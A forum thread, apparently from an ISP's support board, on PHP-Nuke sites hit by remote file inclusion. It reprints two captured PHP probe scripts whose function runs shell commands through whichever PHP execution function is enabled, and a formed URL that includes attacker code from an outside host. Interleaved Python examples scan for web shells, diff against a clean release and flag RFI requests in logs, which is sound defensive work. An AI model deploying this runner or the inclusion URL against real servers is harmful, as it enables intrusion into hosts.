Hackers of PHP nuke websites

BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Hackers of PHP nuke websites

..are using a new tool.
Has anyone seen this code before?
<?php
// Prints the "Mic22" tag, then runs `id` on the server and prints the result:
// a probe to confirm the remote include worked and to learn which user PHP runs as.
echo "Mic22";
$cmd = "id";
$eseguicmd = ex($cmd);   // "esegui" is Italian for "execute"
echo $eseguicmd;

// Runs a shell command with whichever execution function the host has left
// enabled, so a disable_functions list that misses one of them is not enough
// to stop it. The @ suppresses any warning that would give the script away.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            // system() and passthru() write straight to the output,
            // so their result is captured through the output buffer
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            // last resort: popen() is often forgotten when the others are disabled
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;


That's one of many similar hackers that have been caught.
One actually got through and replaced the file favourites.php, then dropped a tarred, gzipped file into the root of my webspace,
and a file named error.php into the root of the webspace.
Guess what .. the hack came from a Plusnet address.
I doubt that the hack originated there; it is most likely that the hacker actually hacked another Plusnet account to hack from there, as he had uploaded an SSH script to his/her webspace.
I suspect that the hacker has uploaded the same script to other unsuspecting Plusnet users' webspace to use as a platform for cracking other webspaces and networks.

This is not uncommon with .. I keep calling it hacking .. it is actually called cracking.

Look in your PHP-Nuke structure for a file named favourite.php .. check the date of the file.
If the date is newer than the other files in that directory .. it has been cracked.
DON'T DELETE THE FILE.
Make it an empty file .. delete the contents of that file, leaving only the <?php and ?>, then make the file READ ONLY.
I have no idea why the file is in the PHP-Nuke distribution; I have looked all over my live site and can see nowhere that I can click on anything remotely looking like favourites.
Check also the root of your webspace for error.txt or error.php; they have been left by the cracker with a simple text line reading "[Censored]", not pleasant .. but it is there.

Check the root of your webspace for a file ending .tar.gz or similar.
This is NOT part of your PHP-Nuke installation .. a cracker has placed it there .. remove it.
How do I know?
I have caught 214 of these [Censored] in just over a week.
As I said .. 1 got through .. and I closed that door also.
Plusnet admins, check my ccgi space please. I moved the file into a directory I made named GOTCHA; the directory and file are now read only, you will have to change permissions to see it. Please remove the file and directory after you have seen it.
Probably best to look at it in a root jail or similar.

Proof of cracking? .. here .. look at this.
http://planetquakewar.com/images/cracker_banned.bmp

Update this thread if you find anything similar in your PHP-Nuke installations.
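As an added example (not code from the thread, and not PHP-Nuke's own), here is the checklist in the post above turned into a script: flag files dated much newer than their neighbours, the attacker's error.php/error.txt, stray archives in the web root, and any PHP file carrying the exec/shell_exec/system/passthru/popen fall-through of the script quoted above; then blank the shell to `<?php ?>` and make it read-only, keeping a copy in a GOTCHA directory for the hosting admins first. The sample tree it builds, the placement of favourites.php in the web root and the 30-day threshold are assumptions made for the demonstration.

```python
import os
import shutil
import statistics
import tempfile
import time
from pathlib import Path

DAY = 86400
# Fingerprint of the ex() runner quoted in the post: it probes each PHP execution
# primitive in turn. Two or more of these strings in one file is a strong hint.
EXEC_PROBES = ("function_exists('exec')", "function_exists('shell_exec')",
               "function_exists('system')", "function_exists('passthru')", "@popen(")
ARCHIVE_SUFFIXES = (".tar.gz", ".tgz", ".tar", ".tar.bz2", ".zip")
DROPPED_NAMES = {"error.php", "error.txt"}   # the attacker's calling card

def mtime_outliers(directory: Path, threshold_days: float = 30.0) -> list:
    """The post's rule: a file dated much newer than its siblings was rewritten.
    Measure against the directory's median mtime so one odd file cannot skew it."""
    files = [p for p in directory.iterdir() if p.is_file()]
    if len(files) < 3:
        return []
    times = {p: p.stat().st_mtime for p in files}
    cutoff = statistics.median(times.values()) + threshold_days * DAY
    return sorted(p.name for p, t in times.items() if t > cutoff)

def looks_like_webshell(path: Path) -> bool:
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return False
    return sum(probe in text for probe in EXEC_PROBES) >= 2

def scan_webroot(webroot: Path) -> dict:
    f = {"archives": [], "dropped_files": [], "webshells": [], "mtime_outliers": {}}
    for p in webroot.iterdir():
        if p.is_file() and p.name.endswith(ARCHIVE_SUFFIXES):
            f["archives"].append(p.name)
        if p.is_file() and p.name in DROPPED_NAMES:
            f["dropped_files"].append(p.name)
    for p in webroot.rglob("*.php"):
        if looks_like_webshell(p):
            f["webshells"].append(p.relative_to(webroot).as_posix())
    for d in [webroot, *(x for x in webroot.rglob("*") if x.is_dir())]:
        outliers = mtime_outliers(d)
        if outliers:
            f["mtime_outliers"][d.relative_to(webroot).as_posix()] = outliers
    for key in ("archives", "dropped_files", "webshells"):
        f[key].sort()
    return f

def neutralise(path: Path, quarantine: Path) -> None:
    """The post's advice, plus a copy for the admins before the evidence is blanked."""
    quarantine.mkdir(parents=True, exist_ok=True)
    shutil.copy2(path, quarantine / path.name)
    path.write_text("<?php\n?>\n")
    path.chmod(0o444)

# Constructed sample (assumption): a year-old PHP-Nuke tree, then what the post
# says the attacker left behind, written now so that it dates newer.
SHELL_SRC = ("<?php\necho \"Mic22\";\n"
             "if(function_exists('exec')){ @exec($_GET['c'],$r); }\n"
             "elseif(@is_resource($f=@popen($_GET['c'],'r'))){ @pclose($f); }\n")

def build_sample_tree(root: Path) -> None:
    old = time.time() - 365 * DAY
    originals = {"index.php": "<?php require 'mainfile.php';\n", "mainfile.php": "<?php // core\n",
                 "config.php": "<?php $dbname='nuke';\n", "admin.php": "<?php // admin\n",
                 "backend.php": "<?php // rss\n", "modules/News/index.php": "<?php // news\n"}
    for rel, body in originals.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
        os.utime(p, (old, old))
    (root / "favourites.php").write_text(SHELL_SRC)        # original replaced by the shell
    (root / "error.php").write_text("[Censored]\n")
    (root / "x.tar.gz").write_bytes(b"\x1f\x8b\x08" + b"\0" * 7)

def demo() -> dict:
    root = Path(tempfile.mkdtemp(prefix="nuke-webroot-"))
    build_sample_tree(root)
    findings = scan_webroot(root)
    gotcha = root.parent / (root.name + "-GOTCHA")
    for rel in findings["webshells"]:
        neutralise(root / rel, gotcha)
    findings["after_neutralise"] = {rel: (root / rel).read_text() for rel in findings["webshells"]}
    findings["quarantined"] = sorted(p.name for p in gotcha.iterdir()) if gotcha.exists() else []
    return findings

if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Against a real site, call `scan_webroot(Path("/path/to/webspace"))` on a copy you downloaded; the mtime rule is a heuristic only (an upgrade or a restore from backup also produces newer files), so treat it as a shortlist to read, not a verdict.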

10 REPLIES
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

I can vouch for that .. I had the same problem..
Even after clearing bans from the 'nuke_blocked_iplist' the problem persisted.
It's using the UNIX id command, possibly to manipulate userinfo ...
All I know is it needs to be passed excess values for it to function;
it essentially provides a way of viewing files, I think (from how it appears).
Mic22 looks to be a tag as well.
(I forget what version of Nuke we put on ... it may also be SQL-injectable if it's not a later version than on Wolfstuff.)
Jim,
Chris Parr
Plusnet Staff
Posts: 17,641
Thanks: 535
Fixes: 159
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

Quote
plusnet admins , check my ccgi space please , I moved the file into a directory I made named GOTCHA , the directory and file is now read only , you will have to change permissions to see it. please remove the file and directory after you have seen it.

I think I actually placed a ticket on your account yesterday about this. We noticed your site had been cracked but didn't know that you had created the GOTCHA file. I'll give the networks guys a nudge when I get in this morning about this.
Chris Parr
Plusnet Staff
Chris Parr
Plusnet Staff
Posts: 17,641
Thanks: 535
Fixes: 159
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

Quote
guess what .. the hack came from a plusnet address.

Can you PM me with proof of this and the address it came from please.
Chris Parr
Plusnet Staff
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

How much proof do you need?
Check the bitmap image in my first post.
It gives the IP address, which resolves to Plusnet in London;
it shows the method used;
and it also shows the URL of the website holding the perl script.
prichardson
Grafter
Posts: 1,503
Registered: 05-04-2007

Re: Hackers of PHP nuke websites

The IP address quoted is our CCGI server itself.

r0ot@echo:~$ host 212.159.7.150
150.7.159.212.in-addr.arpa domain name pointer ccgi02.plus.net.

Looks to have been some form of relay attack which may or may not be on another customer's webspace (this means it could even have been some form of relay, or backdoor relay, in your own code).
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

It looks to be exploiting the "reg" series of PHP commands.
If you look at the query string, and provided you know the workings of PHP-Nuke's modules.php,
then you'd notice that the protection in modules.php uses PHP's "reg" family (for example eregi_replace) in order to filter against certain invalid and exploitative characters, or even simple relative-path tricks.
It's just added a '*/' delimiter to the "name" GET variable to disable those functions and inject code from another file, remote or local (in this case remote, cross-site scripting).
But ... on the other hand, if you can read Italian or know basic Latin such as "sospeso", Account suspended:
http://n3gro.altervista.org/tools/cmd?
doesn't exist (now) - account closed .. so it may not have been that, but I guess it's a script spread amongst "security" sites and so forth.
Upon Googling around this hostname, a number of other sites have this in their logs, so it's possibly a Nuke-wide issue. Perhaps the hosting company / site caught on to the fact that this was happening.
Here is yet another mirror of pretty much the same script: Here
Bearing in mind that 'fsockopen' is available on PlusNet web hosting now (at least it was the last time I checked, about 5 days ago),
you can create sockets and make PHP scripts that would initiate just this kind of attack from what appears as one of the CCGI servers instead of a "real" client.
What I also find confusing is, this script looks to be labelled as a "security" script according to one site ...
After Googling the initial tag on the PHP script's first line, "Mic22" (according to Google Cache, Here), the home website claims to be this "Open Source Host-based Intrusion Detection System". But I cannot find it officially on the website.
Please correct me if I am wrong anywhere.
Jim,
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

Quote from: P
Looks to have been some form of relay attack which may or may not be on another customers webspace

I said that in my first post.
The next step is to search the ccgi02 space for shell scripts that were not uploaded by Plusnet customers,
similar to the script that I trapped and placed in the folder named GOTCHA on my webspace .. have you looked at that file yet?
You will need to chmod 0755 the folder to see the contents, as I have made it 0644 to prevent a hacker accessing it.
Please delete the folder and contents when you have examined it.
I believe it is a perl shell script.

BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

'lo Jim.
I think that the tag mic22 is actually a username for the script to access the perl shell script.
I have seen the script before with the tag 3l33t in the same place as mic22.
Hope that helps.
Prod_Man
Grafter
Posts: 286
Registered: 04-08-2007

Re: Hackers of PHP nuke websites

Google has rendered nothing from that other tag ...
Can't find any traces of perl scripts either
(as far as I have searched / found).
It's at least in the same CCGI root dir / server that your space is on:
ccgi02.plus.net | ( /files/home2/)
I would assume it's in the same space where your site is ...
because the folders are all
chmod'd + owned by the individual users that they belong to, and root, plus (I assume) usernames for other processes / services - "php-user" / "sqluser" - for security and so that scripts etc. can run.
Most likely a code injection (I think)...
1. Download the files from the webspace (do that however you wish).
2. Run a difference/comparison against the "out-of-the-box"/default CMS code and see what we get.
That's all I can think of that might be beneficial to finding the actual root cause at the moment.
Hope that helps..
Jim,
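The two-step comparison suggested in the post above, as an added example (not code from the thread or from PHP-Nuke): hash every file in a pristine unpack of the same CMS version and in the downloaded live copy, then report what was added, removed or modified. Files the site is expected to have edited (config.php with the database credentials) are listed separately so they do not drown out the real changes. The two sample trees and their file names are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path

def tree_digest(root: Path) -> dict:
    """Relative path ('/'-separated) -> SHA-256 of content, for every file under root."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }

def compare_trees(clean: dict, live: dict, expect_local=("config.php",)) -> dict:
    """Triage order: 'added' first (dropped shells, archives, the attacker's notes),
    then 'modified' (originals with something spliced in), then 'removed'.
    Paths in expect_local are legitimately site-specific and reported apart."""
    changed = sorted(p for p in set(clean) & set(live) if clean[p] != live[p])
    return {
        "added": sorted(set(live) - set(clean)),
        "removed": sorted(set(clean) - set(live)),
        "modified": [p for p in changed if p not in expect_local],
        "local_edits": [p for p in changed if p in expect_local],
    }

def write_tree(root: Path, files: dict) -> None:
    for rel, body in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body if isinstance(body, bytes) else body.encode())

# Constructed sample: a clean unpack of the CMS beside a downloaded live copy.
CLEAN_FILES = {
    "index.php": "<?php require 'mainfile.php';\n",
    "mainfile.php": "<?php // core\n",
    "config.php": "<?php $dbpass='';\n",
    "modules/News/index.php": "<?php // news\n",
    "modules/Search/index.php": "<?php // search\n",
}
LIVE_FILES = dict(CLEAN_FILES)
LIVE_FILES["config.php"] = "<?php $dbpass='s3cret';\n"                       # legitimate site edit
LIVE_FILES["modules/News/index.php"] += "<?php @include($_GET['p'].'/x.txt'); ?>\n"  # spliced-in backdoor
LIVE_FILES["favourites.php"] = "<?php echo 'Mic22'; ?>\n"                     # dropped shell
LIVE_FILES["error.php"] = "[Censored]\n"
LIVE_FILES["x.tar.gz"] = b"\x1f\x8b\x08"
del LIVE_FILES["modules/Search/index.php"]                                    # a module went missing

def demo() -> dict:
    base = Path(tempfile.mkdtemp(prefix="nuke-diff-"))
    write_tree(base / "clean", CLEAN_FILES)
    write_tree(base / "live", LIVE_FILES)
    return compare_trees(tree_digest(base / "clean"), tree_digest(base / "live"))

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

For a real comparison, `compare_trees(tree_digest(Path("phpnuke-clean")), tree_digest(Path("site-download")))`; the clean tree must be the exact release the site runs, or every patched file will show up as modified.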
BattleRat
Grafter
Posts: 104
Registered: 01-08-2007

Re: Hackers of PHP nuke websites

Remember I said that I have seen a script with another username?
Have a look at this:
<?
// Same runner as the first sample with a different tag ("31337"), plus some host
// fingerprinting (OS, kernel, free disk space) printed before the `id` output.
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

// Identical to ex() in the first sample: falls through exec, shell_exec, system,
// passthru and finally popen until it finds one that is not disabled.
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}

// Human-readable byte count for the free-space line.
function view_size($size)
{
    if (!is_numeric($size)) {return FALSE;}
    else
    {
        if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
        elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
        elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
        else {$size = $size . " B";}
        return $size;
    }
}


Here is the formed URL:
http://ccgi.linux2000.plus.com/index.php?basepath=http:/kisme.hostinggratisusa.com/safe.txt?Huh
and the attacker is using this URL
http://kisme.hostinggratisusa.com/safe.txt?Huh
from this IP
213.89.9.5
No, he didn't get through :-)
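As an added example (not code from the thread or from PHP-Nuke), here is the formed URL above taken apart, the same request pattern looked for in an access log, and the shape of a fix. It also covers Prod_Man's earlier point about code being pulled in from a remote file through a query-string variable. The vulnerable `include()` shape, the allow-list of module names and the log lines are assumptions for the demonstration; the first log line is modelled on the request in the post, the others are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed shape of the vulnerable code (a $basepath taken from the request and
# used in include()); not quoted from PHP-Nuke itself:
#   include($basepath . "/modules/" . $name . "/index.php");
INCLUDE_TAIL = "/modules/News/index.php"

def composed_include_target(basepath: str, tail: str = INCLUDE_TAIL) -> dict:
    """What include() is handed once the attacker's basepath is concatenated.
    The '?' the attacker appends turns the server's own suffix into a query
    string, so the remote host serves safe.txt whatever gets appended."""
    target = basepath + tail
    u = urlsplit(target)
    return {
        "target": target,
        "is_remote": u.scheme.lower() in ("http", "https", "ftp", "ftps"),
        "host": u.netloc,
        "fetched_path": u.path,
        "discarded_as_query": u.query,
    }

REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

def rfi_params(request_target: str) -> list:
    """(name, value) pairs whose value is itself a URL: a remote-include attempt.
    parse_qsl undoes percent-encoding, so an encoded 'http://' is caught too."""
    query = urlsplit(request_target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(unquote(v))]

# Apache combined log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def scan_log(lines) -> list:
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        params = rfi_params(m["target"])
        if params:
            hits.append({"ip": m["ip"], "status": m["status"],
                         "target": m["target"], "params": params})
    return hits

# Hardened replacement for the assumed pattern: never build an include path from
# request data; map a module name onto an allow-list of local files instead.
ALLOWED_MODULES = frozenset({"News", "Search", "Your_Account"})

def resolve_module(name: str):
    """Local include path for an allow-listed module name, else None."""
    return f"modules/{name}/index.php" if name in ALLOWED_MODULES else None

# Constructed log lines (timestamps, the benign request and the encoded one are made up).
SAMPLE_LOG = [
    '213.89.9.5 - - [12/Aug/2007:03:14:07 +0100] "GET /index.php?basepath=http://kisme.hostinggratisusa.com/safe.txt?Huh HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [12/Aug/2007:03:15:00 +0100] "GET /modules.php?name=News&file=article&sid=42 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Aug/2007:03:16:21 +0100] "GET /index.php?basepath=%68ttp%3A%2F%2Fexample.net%2Fcmd.txt%3F HTTP/1.1" 404 301 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    print(composed_include_target("http://kisme.hostinggratisusa.com/safe.txt?Huh"))
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["params"])
```

A 200 on such a request only says the page rendered, not that the remote file was executed; what decides it is whether the PHP build had `allow_url_fopen` (and, from PHP 5.2, `allow_url_include`) switched on. Turning both off in php.ini closes this whole class, and the allow-list above removes the dependency on those settings.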